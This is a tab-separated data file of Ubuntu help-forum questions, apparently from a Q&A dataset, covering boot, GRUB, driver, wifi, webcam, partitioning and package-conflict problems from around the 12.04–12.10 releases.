205493	system does n't boot due to a `` [ drm : drm_crtc_helper_set_config ] * error * ``	i have a problem with the new ubuntu 12.10 . it finished installing correctly , but when i restart my computer an error message appears : [ 15.854296 ] [ drm : drm_crtc_helper_set_config ] * error * failed to set mode on [ crtc : 10 ] * checking battery state [ 17.814209 ] [ drm : drm_crtc_helper_set_config ] * error * failed to set mode on [ crtc : 10 ] and that screen does not advance . i also tried booting from the recovery mode and it starts , but it 's too slow loading windows and also shows me a window with an error message : sorry ubuntu 12.10 has experienced an internal error more details : executable path /usr/bin/xorg i have used ubuntu since the 2008 version and never had this problem . i hope you can help me . computer specs : compaq sr2015la amd sempron 2gb . ram 80gb hard drive translated from the original spanish
205494	how to restrict a user account to a specific time period	i 'm using 12.04 and would like to make one user account open for use 24/7 and one account only available from 8:00am to 12:00am so when the user attempts to login after midnight , they are denied access .
205503	performance tweaks for 12.10	i am running 12.10 on a two year old sony vaio laptop ( i7 with 8gb ram and ssd disk ) overall performance nothing like as snappy as i would have expected . i am using the nvidia proprietary driver . might that impact performance ? also fans on the laptop seem to be thrahing hard all the time . otherwise any quick tweaks that can be applied to make the machine fizz along a bit faster would be appreciated . thanks matthew
205512	touchpad palm sensitivity	i 'm using ( k ) ubuntu 12.04 lts with a synaptics touchpad . the palm sensitivity it terrible , whenever i 'm typing the mouse suddenly jerks off to a different place . is there a way to enable/increase palm sensitivity ?
205513	lubuntu 12.10 ppc-ca n't login after install	i installed lubuntu 12.10 ppc alt . install on my ibook g4 , yaboot failed to install so i used the advice given in the ppc faq here , https : //wiki.ubuntu.com/powerpcfaq # i.27ve_lost_yaboot.2c_what_can_i_do.3f and i was able to boot to a black screen with and move the arrow but thats all , when trying to login by pressting ctrl+alt+f1 i kept getting `` invalid '' login . i reinstalled and yaboot failed again , except this time i am unable to boot even to a black screen and trying to login via pressing ctrl+alt+f1 still gives me an invalid login message despite the fact i know 100 % i am correctly typing in my username and password . edit : for some reason another reinstall went smoothly despite using the disc . i was able to login but had to use single user mode to reset my password as the invalid login error occurred again .
205514	create ubuntu recovery partition	i have an hp laptop that came with windows 7 installed with a recovery partition which was accessible through the boot menu in the same way you could access the bios . i wanted to be able to create an ubuntu recovery partition that would be able to be accessed and used in the same way . is this possible and if so how , and if not i 'd like to offer this idea as a suggestion . thanks .
205520	history list without timestamp and unique the results	using bash , i save my history with the timestamp . how do print the history omitting the timestamp ? alias h=history alias g=grep -i to find lines that i used for heroku , i type : > h | g heroku i 'd like to unique the results without the time-stamp , naturally . this question is somewhat related : how to avoid duplicate entries in .bash_history however , sometimes i want to see the duplicate in the history to see the context under which a command was run .
205522	how to check if a webcam is broken ?	i just bought an acer aspire 3830tg , it comes with an integrated 1.3m hd webcam . before buying it i tried with a bootable lubuntu usb stick , everything worked well except for the webcam , which i thought i had to tweak . the thing is that it seems the camera should work with no problems in ubuntu . the driver is detected , i tried dmesg | grep uvcvideo and the output is [ 12.226174 ] uvcvideo : found uvc 1.00 device 1.3m hd webcam ( 058f : b002 ) [ 12.245553 ] usbcore : registered new interface driver uvcvideo i 've also tried using different software ( guvcview is black when camera output is mjpg and turns to funny colors when yu12 or yv12 , cheese is always black , camorama is always with funny colors ) . i should have checked that it was working properly with the default os ( windows ) but now it 's too late for that . i even booted with a official ubuntu quantal distro from the usb pen , and the results are the same . is there any way to check that the camera is righmt or broken ? so , if it 's broken , at least i can go to the shop , show them that it 's really broken and get an external webcam for free , or something like that . update 1 i ran sudo lsinput , and the output info about my video is the following : /dev/input/event6 bustype : bus_usb vendor : 0x58f product : 0xb002 version : 2 name : `` 1.3m hd webcam '' phys : `` usb-0000:00:1a.0-1.3/button '' bits ev : ev_syn ev_key /dev/input/event7 bustype : bus_host vendor : 0x0 product : 0x6 version : 0 name : `` video bus '' phys : `` lnxvideo/video/input0 '' bits ev : ev_syn ev_key with this info , i 'm not sure about running the luvcview command . when i run luvcview -d /dev/video0 -l , the output is the following : sdl information : video driver : x11 a window manager is available device information : device path : /dev/video0 { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/7 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/7 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/7 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/7 , 1/5 , { pixelformat = 'mjpg ' , description = 'mjpeg ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/15 , 1/10 , 1/5 , { pixelformat = 'rgb3 ' , description = 'rgb3 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/15 , 1/10 , 1/5 , { pixelformat = 'bgr3 ' , description = 'bgr3 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/15 , 1/10 , 1/5 , { pixelformat = 'yu12 ' , description = 'yu12 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/15 , 1/10 , 1/5 , { pixelformat = 'yv12 ' , description = 'yv12 ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/30 , 1/25 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 800 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 960 } time interval between frame : 1/15 , 1/10 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/15 , 1/10 , 1/5 , if i run luvcview by itself , the image is funny ( blue and red colors , mainly , with myself in negative state ) .
205523	ubuntu 11.10 ca n't play music with logitech bluetooth receiver	i 'm a very basic ubuntu 11.10 user and i 'm trying to stream music on a logitech wireless speaker adapter for bluetooth audio devices . i can get to pair the device with my computer , but i ca n't play music . i also ca n't find the device on the sound settings . i tried with blueman , but with the same results . i 've seen that this problem was solved before , but i ca n't make it work in mine .
205525	how to build an usb driver and data extractor ( magnetic card reader ) ? [ python , ruby ]	so i have this magnetic card reader ( generic ) i bought from the internet ( it 's chinesse ) the problem is it has a manual but it is in chinesse ( hahhaha ) so i do n't understand it ... i have two linux machines ( one ubuntu and one fedora ) and if you plug it via usb , it powers on and if you pass a card ( with a text editor open ) you get a code/string somewhat like this one : 1303031110012015多999999999999999 obviously there is the card info somewhere ( that 's a cinema affiliation card ) and what i want to do is to extract the info ( like owner 's name and other data for example ) from that number , if i run lsusb i get something like this : reader unplugged : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 04f2 : b293 chicony electronics co. , ltd bus 007 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth reader plugged : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 04f2 : b293 chicony electronics co. , ltd bus 007 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 005 device 005 : id 05fe:1010 chic technology corp. optical wireless and i know some python and ruby ( more ruby than python ) , but i do n't know where to start ... it would be great if some one can point me in the right direction.. 多can you ? ( it would be great to have a cross-platform driver for windows , linux and mac ) . thanks . p.s . this is the card reader i bought : http : //dx.com/p/usb-universal-magnetic-stripe-credit-debit-card-bidirectional-track-2-swipe-reader-75-210bpi-25053
205527	slow dns resolution after upgrade	i 've been having some strange issues with what also seems to be a resolution issue . some sites load ( very slowly ) , others time out . not sure how to troubleshoot this one but would appreciate help , and will update my question with more data as it 's requested . what i 've tried : dpkg-reconfigure bind9-host : read about this in a seemingly related post dig @ nameserver-ip askubuntu.com ; < < > > dig 9.8.1-p1 < < > > @ nameserver-ip askubuntu.com ; ( 2 servers found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached background : i recently tried to upgrade to 12.10 directly from 12.04 . this failed for whatever reason , to grub rescue . allright , no problem , on another computer i get a usb key setup for installation , install ( delete everything ) . load up , connect to wifi , no problems to speak of , install goes smoothly . after which , i did n't use the machine . now , this is a fresh install , so why is my dns set to google ( 8.8.8.8 , 8.8.4.4 ) ? strange indeed . but , perhaps a fragment from the previous install . and not my actual question but noted just in case it 's relevant .
205532	i just dual booted 12.10 into my asus g74sx installed nvidia drivers and now i cant see the dash and pretty much anything help !	i installed some nvidia drivers on my laptop and now i cant see anything . not the menu bar , the dash , no window buttons , that is to say the x the minimize button or the maximize one . this is getting kinda annoying ! how can i fix it ? : (
205542	ccsm is n't remembering my settings .	i am currently using gnome shell on precise and trying to disable the < alt > button1 shortcut for dragging windows . i have taken the following steps . pressed alt+f2 , typed ccsm and pressed enter . scrolled down to `` move window '' and clicked it . clicked the < alt > button1 button next to `` initiate window move '' . unchecked the `` enabled '' box and clicked ok. closed ccsm and restarted it . sadly , as soon as i restart ccsm , it appears that nothing has actually been modified since `` initiate window move '' still seems to be mapped to < alt > button1 . no matter how many times i perform the above steps and restart ccsm , i still get the same results . what do i need to do to disable this shortcut ?
205545	incorrect password at cardamom login for ubuntu 10.04.4 lts	i installed ubuntu 10.04.4 lts on a single board computer ( namely roboard ) through a usb . after intallation and reboot , i got into the login page with the word `` cardamom under the ubuntu logo . i remember the user name and password i set during installation , but those did n't work . it said authentication error and incorrect login . does anyone know what the problem might be ? ?
205546	problem reinstall grub2	i tried to upgrade from 12.04 - > 12.10 . the install seemed to go well but upon reboot , i get the grub recovery console . i tried to reinstall using the boot-repair boot repair which usually works a treat . however this time it says it is scanning my hdd and never recovers . when i try to reinstall grub from the livedvd using the old grub-install < dir > < dev > -- recheck -- debug & > gruboutput.txt i get this pastebin link i think it should be installing to dev/mapper/isw_gbaaebhfe_volume0 even when i made -- > dev/mapper/isw_gbaaebhfe_volume3 any help would be appreciated
205547	fresh install and partitioning problem and doubts	i have two questions : i have a fresh install of ubuntu and in gparted i have the information of having : /dev/sda1 ext2 /boot 243mb 49.22mb used /dev/sda2 extended 595.93 gib /dev/sda5 crypt-luks 595.93 gib this last line has a `` ! '' mark that says : `` linux unified key setup encryption is not yet supported '' . sda5 is accopolated to sda2 as if we are talking about the same partition , in fact my hard drive has 600gb . so is there any problem with the partition configuration and with the clean install of my ubuntu ? it is like it should be ? because i had a lot of problems with formatting and partitions . should i keep it like this or format again and create partition for swap , boot and home like i see everyone talking about ? it would be better for the pc ? do n't know if you need this information but i have 6gb of ram , and a i7 processor on a laptop .
205553	wo n't dual boot windows xp and ubuntu 12.04	after installing ubuntu 12.04 from a dvd it wo n't boot . it is installed along side windows xp . windows xp boots with no option to boot ubuntu .
205560	setting up lvm with hdd and ssd	my current hard drive is just about full and rather than just toss it and get a new one ( since it works fine ) , i want to get a new drive and set them both up using lvm . while i 'm at it , i also want to get an ssd to install the os and applications on . this is my plan : put / on the ssd ( one partition ) put /tmp on a ram disk put /var on a partition on my new drive put /home on the rest of the new drive and my current drive using lvm . my goals are : speed up boot time and application launch minimize unnecessary writes to the ssd never have to worry about which disk/partition to store my files on . i want the os & lvm to take care of that does this make sense ? i 'm fairly experienced with ubuntu but i 've never dealt with lvm before .
205565	i used grub-customizer and now it gets stuck at the grub screen . please help !	i wanted to make the grub screen a little more appealing so i got the grub-customizer app and tried to add a background image . once i did that i rebooted my pc to check it out but then i found out i could n't get back into either operating systems . the only reason i am able to ask this question is because i booted from the ubuntu cd . please is there anything i can do ?
205574	my upgrade from ubuntu 12.04 to 12.10 got cancelled due to powercutoff	my upgrade from ubuntu 12.04 to 12.10 got cancelled due to the power being cut off , now ubuntu is not starting . what can i do ? i run windows 7 and ubuntu . so please help me to get out of this mess because all my files were in ubuntu . and also i had installed a lot of apps in it . if i loose it i will be in trouble . please help .
205575	12.10 x64 - rtl8188ce - intermittent/slow internet connection	i have to reset my internet connection often to get it to work . when it does work , it 's definitely slower than when i 'm on my windows installation . my computer uses an rtl8188ce wireless card from realtek . i 'm running the 64-bit version of ubuntu 12.10 . power management is not on . i 've read on other sites that some people fixed the issue pertaining to this wireless card by downloading and installing the drivers from the realtek site , but it seems as if that only helped people with 32-bit installations . anyone have any luck with this specific wireless card ?
205582	how do i get an atheros ar8162 working ?	i upgraded from 12.04 to 12.10 , my ethernet network card did not work , i tried to do the same procedure as did the version of ubuntu 4.12 , but it did n't work . does anyone have a clue how to do it ? lo link encap : loopback local inet end . : 127.0.0.1 masc:255.0.0.0 endereço inet6 : : :1/128 escopo : máquina up loopback running mtu:16436 métrica:1 pacotes rx:684 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:684 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:0 rx bytes:66739 ( 66.7 kb ) tx bytes:66739 ( 66.7 kb ) wlan0 link encap : ethernet endereço de hw e0:06 : e6 : d0 : da:3d inet end . : 192.168.1.100 bcast:192.168.1.255 masc:255.255.255.0 endereço inet6 : fe80 : :e206 : e6ff : fed0 : da3d/64 escopo : link up broadcast running multicast mtu:1500 métrica:1 pacotes rx:2040 erros:0 descartados:0 excesso:0 quadro:0 pacotes tx:2352 erros:0 descartados:0 excesso:0 portadora:0 colisões:0 txqueuelen:1000 rx bytes:1149462 ( 1.1 mb ) tx bytes:307333 ( 307.3 kb )
205583	boot up resolution error , how to fix ?	me , being horrendously new to ubuntu and linux in general , i have not the slightest clue what is wrong , except for the fact my resolution is smaller than it should be and the menu on the side is gone . any idea how to fix this ?
205586	when trying to upgrade update manager to 12.01 it wo n't let me continue with out authenticate password	pop up reads , `` enter your password to perform administration tasks , the application 'update manager ' let 's you modify essential parts of system . password : then options to cancel and press ok . problem is i do n't know the passcode .
205588	using linux as guest on vmware and sharing connection with windows vista	i 've been trying for weeks with vmwware player , now d/l vmwware work station 7 , i have a laptop with one built in modem and a usb modem i bought , it works great switching it over from host to use in ubuntu to connect to the net . when i use that modem from the host to connect online i have no trouble getting ubuntu to share the internet connection , but tried with nat bridge host and all to get it to work from ubuntu to share the internet connection to windows vista , the host , i know it should work if it works the other way around , i tried setting up my wlan0 eht0 and eth1 to the correct ip can get both systems to notice each other by name and ip , but cant get them to share the connection from guest to host . i 've tried iptables and all as well , can someone please help me out with this ? i am sure it is something i 'm over looking , thanks in advance .
205589	`` a disk read error '' while starting windows after ubuntu upgrade + boot repair	i just upgraded to 12.10 . after installing the files and rebooting i had come across following problem : error file not found grub rescue > _ this problem was easily solved by repairing the boot using boot repair tool . this answer helped me . but after this , windows wo n't start . it 's giving following error : a disk read error has occurred press ctrl+alt+del to restart how do i fix this ?
205591	no internet - please help ?	i just got ubuntu and i am really really really a linux novice . i ca n't get the wireless to work ? i played around with it until i saw it says `` wireless firmware missing '' - hardware address 00:14 : a5:6a:17 : c2 . on my laptop there is a button that looks like a little antenae that means the wireless is on . the funny thing is that this button does not seem to do anything right now - the light is not lit up and does not light up . any thoughts you have on getting this going are appreciated !
205594	gnome-terminal scrollback disappearing	when i enter a newline in the commandline , or a command emits a newline , it makes a line of text at the top disappear , almost as though i had a 30 line scrollback . however , i have an unlimited scrollback . restarting gnome-terminal does not fix the problem . versions : gnome terminal 3.4.1.1 ubuntu precise pangolin
205597	laptop switches off during the installation process	i am installing ubuntu 12.10 on an acer 5315 laptop . i have burned an image of the iso on a dvd and when the disk boots everything looks like it is going according to plan . i choose the option to replace my windows os and delete all data and files and the install begins . i pass the various screens while the files are being copied but then at some stage during the copying process my laptop just switches itself off with no warning . i have tried 3 times now and it always switches off at completely different times during the installation . any ideas ? the dvd is brand new and seems perfect . thanks
205598	avg antivirus not working	i want to install avg 2012 antivirus on my ubuntu 12.10 , when i install it with gdebi it gets installed without any problem , but when i try to start avg antivirus form terminal by typing following commond : sudo avgctl -- start it show following error message : /usr/bin/avgctl : 17 : exec : /opt/avg/av/bin/avgctl : not found when i checked the files manually they are there . i do n't understand what is the problem , though my avg antivirus was working fine on my ubuntu 12.04 lts . hope somebody will help .
205613	rescue grub problem 12.04	i have a problem with starting ubuntu 12.04lts in a system which has a windows 7 beside . the grub can not load and we see a massage which announces there is a problem with grub and there is a line like : grub rescue > i can load the system with a grub recovery cd , but the loaded grub knows the other os as a windows vista . how can i fix it and have my two os without needing cd .
205619	i 'm at the boot : prompt	i have ubuntu 10.04 on a bootable flash drive . it appears that the configuration file is not there anymore . i need to know what the commands are to get me back into the system . i am sitting at the boot : prompt now i do know that vmlinuz works but then it says `` kernel panic '' and freezes the computer
205623	booting ubuntu with refit fails	i have , for quite some time , a dual boot setup on my macbook pro with macos x ( minimal setup for emergencies ) and ubuntu ( the system i use daily ) . i have refit 0.14 installed . i am running this setup on this machine for well over a year without an issue . this morning i rebooted my macbook and when it came back up , it showed the refit menu but the linux entry would not work . when selecting it , all i would see is the penguin , and nothing else happens . booting macos x works fine . i have access to the file system via fuse-ext2 on macos , and looking at the logs the laptop booted the last time on october 22nd . the only system update afterwards was this morning , but only for git , some xserver input module , ruby and macfanctld . no updates to grub or the kernel . i am a bit at a loss what to do , any pointers are greatly appreciated . i already reset the nvram and the smc . i also tried syncing the partitions but it refused to do so due to `` analysis inconclusive '' ( the mbr partition table shows two additional partitions at the end ( linux root and swap ) that the gpt table does not , however the grub partition is shown in both ) .
205628	the nvidia x driver is not new enough to support the nvidia-settings display configuration page	i 've been trying without success to configure dual monitors on 12.04 , i 've installed the nvidia drivers but the gui tool does n't seem to support my graphics card . any idea on how to resolve this ? oh , and the output from $ lspci | grep vga $ 01:00.0 vga compatible controller : nvidia corporation g86 [ quadro nvs 290 ] ( rev a1 )
205630	no sound on my compaq cq43	i 'm new to linux . i 've ubuntu 10.04lts installed , but i 'm not able to play any sound . i do n't know how to install sound drivers on my machine .
205633	ubuntu for my asus netbook	i have an asus netbook with the following specs : processor : amd c-50 processor ( 2 cpus ) , ~1.0ghz memory : 1024mb ram available os memory : 750mb ram also have amd hd 6250 as graphic card . i want to know what is the best ubuntu version for this hardware ? i have tried ubuntu 12.04 and 11.10 and they both were sluggish . i had them installed as wubi..is it my machine that is just slow or its the wubi installation ? ( full install vs wubi install ) but then again i heard ubuntu does not require high spec hardware..please help , windows starter is just painfully slow
205634	precise suddenly showing blank screen on bootup	i 've been using my system for quite some time now , and it 's been working ( more or less ) fine . but today , for no apparent reason , my it suddenly stopped working . what happens is that when i turn on the computer , ubuntu loads until the stage where it shows the mouse pointer . then , it just hangs there without ever getting around to showing the login screen . what 's wrong ?
205636	ubuntu 12.10 upowerd crash	my recently-upgraded lenovo thinkpad t420 is running ubuntu 12.10 mostly fine . however , i 've noticed that on wake from sleep , the gnome-power-manager applet that shows battery status fails to update . there are a few complicating factors here : i am using a bluetooth mouse , whose battery shows in the power manager applet when connected ( and reads `` not present '' when it is disconnected ) when i wake the computer and try to use the mouse again , the system reports `` a problem '' that it wants to report . the detailed report simply indicates that upowerd has crashed . after upowerd crashes , the bluetooth mouse does n't work . additionally , the system stops reporting battery status . shown below is the battery applet menu , reporting the mouse as not present ( because it is powered off ) and the laptop battery as 1:32 to charge , even though the laptop battery is fully charged . the final problem seems to be that the system will not suspend when i close the laptop lid ; i must tell it to suspend explicitly . how can i fix upowerd ? i do n't want to have to downgrade to 12.04 , but at this rate the system is unusable , since i have no idea how much battery power is left . edit : i reproduced the problem to get a dmesg output . i logged in , turned on the mouse , and it worked . i closed and then opened the laptop lid , and the mouse was unresponsive ; i reset the mouse , but it did not reconnect . this indicates the problem , so i looked at dmesg , which showed : [ 47.682829 ] power_supply hid-00:02:76:32:33:9c-battery : > driver failed to report `capacity ' property : -5 [ 52.674019 ] power_supply hid-00:02:76:32:33:9c-battery : > driver failed to report `capacity ' property : -5 [ 53.663261 ] hid-generic 0005:17ef:6002.0002 : > unknown main item tag 0x0 [ 53.677893 ] input : thinkpad bluetooth laser mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/bluetooth/hci0/hci0:11/input15 [ 53.678081 ] hid-generic 0005:17ef:6002.0002 : > input , hidraw0 : bluetooth hid v2.45 mouse [ thinkpad bluetooth laser mouse ] on 7c : e9 : d3 : bc:17 : ab [ 53.743138 ] do_trap : 54 callbacks suppressed [ 53.743141 ] upowerd [ 1883 ] trap int3 ip:7fa6657d3c7f sp:7fff45190b70 error:0 [ 95.418673 ] power_supply hid-00:02:76:32:33:9c-battery : > driver failed to report `capacity ' property : -5 [ 100.407340 ] power_supply hid-00:02:76:32:33:9c-battery : > driver failed to report `capacity ' property : -5
205643	how to connect to windows pc in graphical mode ?	my basic desktop pc uses ubuntu 12.04 . however for work i need a few programs ( like hec-ras ) that i did n't succeed to run trough wine or play on linux . i thought of easy solution : to connect windows pc in graphical mode . i can succeed with it using teamviewer , however i 'd like to connect trough my local network . how do i achieve that ? thanks in advance , misery
205644	can not be configured because libattr1 : i386 is at a different version	i can not upgrade or install any software . problem started few weeks ago , when i tried to upgrade from 12.04 to 12.10 alpha . i was getting an error parsing file /var/lib/dpkg/status . but with my editor , i found the package that was giving me the parsing error , and removed all the the lines that has anything to do with it . i did the trick for several package and now there is not more parsing error . now , i got this internal error , no file name for libattr1 below is the command and the error : sudo dpkg -- configure -a dpkg : error processing libattr1 : amd64 ( -- configure ) : package libattr1 : amd64 1:2.4.46-8ubuntu1 can not be configured because libattr1 : i386 is at a different version ( 1:2.4.46-5ubuntu1 ) dpkg : error processing libattr1 : i386 ( -- configure ) : package libattr1 : i386 1:2.4.46-5ubuntu1 can not be configured because libattr1 : amd64 is at a different version ( 1:2.4.46-8ubuntu1 ) errors were encountered while processing : libattr1 : amd64 libattr1 : i386 i have been stuck for several weeks . please help me to solve this libattr1 configuration problem . thanks
205653	zotero error in libreoffice	i installed zotero standalone in 12.10 64bit . some problems which i managed to fix . the one that remains is an error saying `` openoffice.org could not communicate with zotero . make sure zotero standalone or firefox are open and set to an online state and try again '' . that 's when i click any button in the zotero toolbar in libreoffice . firefox does n't open with a the plugin installed and a working internet connection . the zotero troubleshooting which mentions this error was of no help to me . i find reports about this bug going back as far as 2009 but i have n't found anything of help .
205665	how do i remove libavcodec53 and libavutil51 before installing ubuntu restricted extras ?	hello i want to install ubuntu-restricted-extras after i installed ubuntu 12.10 i get an error to remove libavcodec53 and libavutil51 . can someone please tell me how i remove the above items from my computer . thank you . gil
205666	incorrect spell check results	firefox and gedit ( at least ) are checking spelling wrongly . which package should i file a bug against ? for some time i 've had issues with spell checking in firefox . i had n't bothered with them since i did n't want to clear my profile and do all the other necessary troubleshooting steps . i 've seen this bug report but it seems to be languishing because it 's missing key information . here are my symptoms : in firefox , the spell checker only underlines words containing apostrophes ( all of them ) and deems every other word to be correct . here 's a screenshot : in gedit , words appear to end at apostrophes . but , the problem is less serious as the following two screenshots show : other information this is a fresh install of quantal with a clean $ home . however , i 've experienced the firefox issue for at least a year , perhaps longer . the gedit issue i only noticed in the course of testing the bug i referenced earlier . i experience the firefox issue on a different machine running precise . i have not tested the other machine with gedit . my locale is en_us.utf-8 and my keyboard layout is korean ( hardware and software ) . i do n't know whether these two issues are related or separate problems . i care a lot about the firefox problem . i do n't care very much about the gedit issue .
205668	convert quilt to native source package	i want to branch an open source package and develop a new branch of package alternatively . the package is in quilt format and need to use dquilt for update but i do n't want to use it for my branch development . i want to know if i change debian/source/format to native do i loss any thing ? existing patches in debian/patches still apply to package or i lose them completely ?
205670	wifi problem after ubuntu 12.10 update	i just updated my ubuntu 12.10 today and it went fine and i was told to restart system and after i restart my wifi stopped working . mine is broadcom bcm4312 card . it was working fine just before the update , i tried reinstalling driver from software sources and it didn’t work , it shows the proprietary driver in use but network manager doesn’t detect my wifi card .
